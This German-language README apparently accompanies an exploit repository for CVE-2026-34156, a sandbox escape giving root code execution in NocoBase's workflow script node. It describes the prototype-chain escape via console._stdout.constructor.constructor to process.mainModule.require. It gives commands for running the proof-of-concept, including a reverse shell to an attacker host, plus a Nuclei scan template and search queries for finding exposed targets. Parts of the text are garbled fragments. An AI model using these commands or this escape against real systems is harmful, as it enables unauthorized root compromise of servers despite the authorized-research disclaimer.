
CVE-2026-34156
Nicht authentifiziert / Niedrige Berechtigungen → Root Remote Code Execution in NocoBase
CVE-2026-34156 ist eine kritische Sandbox-Escape-Sicherheitslücke in NocoBase (einer Open-Source-No-Code/Low-Code-Plattform).
Ein Angreifer, der in der Lage ist, einen Workflow-Skript-Knoten zu erstellen oder auszuführen (selbst mit niedrigen Berechtigungen), kann die Node.js vm-Sandbox verlassen und eine vollständige Remote-Code-Ausführung als Root innerhalb des Containers erreichen.
@nocobase/plugin-workflow-javascript (Skript-Knoten)console._stdout.constructor.constructoruid=0)fs)Das in die Sandbox übergebene console-Objekt stammt aus dem Host-Bereich, was es Angreifern ermöglicht, die Prototypenkette zu erklimmen und auf den echten Function-Konstruktor → process.mainModule.require zuzugreifen.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
Repository enthält: Vollständiges PoC-Skript, Nuclei-Vorlage und Sicherheitsprüfer.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) in der Produktion.
Dieses Repository dient ausschließlich Ausbildungs- und autorisierten Sicherheitsforschungszwecken.
Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.
Unbefugte Ausnutzung ist illegal.
Mit ❤️ für die Sicherheits-Community erstellt
Bleiben Sie sicher. Patchen Sie schnell.